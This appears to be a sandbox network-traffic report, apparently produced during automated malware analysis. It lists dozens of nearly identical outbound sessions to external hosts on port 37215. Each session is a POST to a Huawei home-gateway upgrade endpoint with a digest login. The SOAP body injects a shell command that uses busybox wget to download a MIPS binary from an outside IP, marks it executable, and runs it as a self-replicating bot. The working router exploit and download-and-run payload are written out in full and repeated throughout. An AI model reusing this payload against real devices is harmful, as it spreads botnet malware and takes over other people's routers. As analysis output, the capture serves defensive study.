                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        247192.168.2.2338332118.5.88.13737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316231966 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        248192.168.2.235182841.23.56.737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316231966 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        249192.168.2.2335782155.214.61.5537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316231966 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        250192.168.2.2347678197.237.113.13137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316234112 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        251192.168.2.2359210218.232.209.18537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316235065 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        252192.168.2.2342184197.239.91.4437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316235065 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        253192.168.2.234967497.142.209.15737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316241026 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        254192.168.2.2351948158.30.37.7237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316241026 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        255192.168.2.2348644197.98.134.17537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316289902 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        256192.168.2.2343060157.101.14.14337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316298962 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
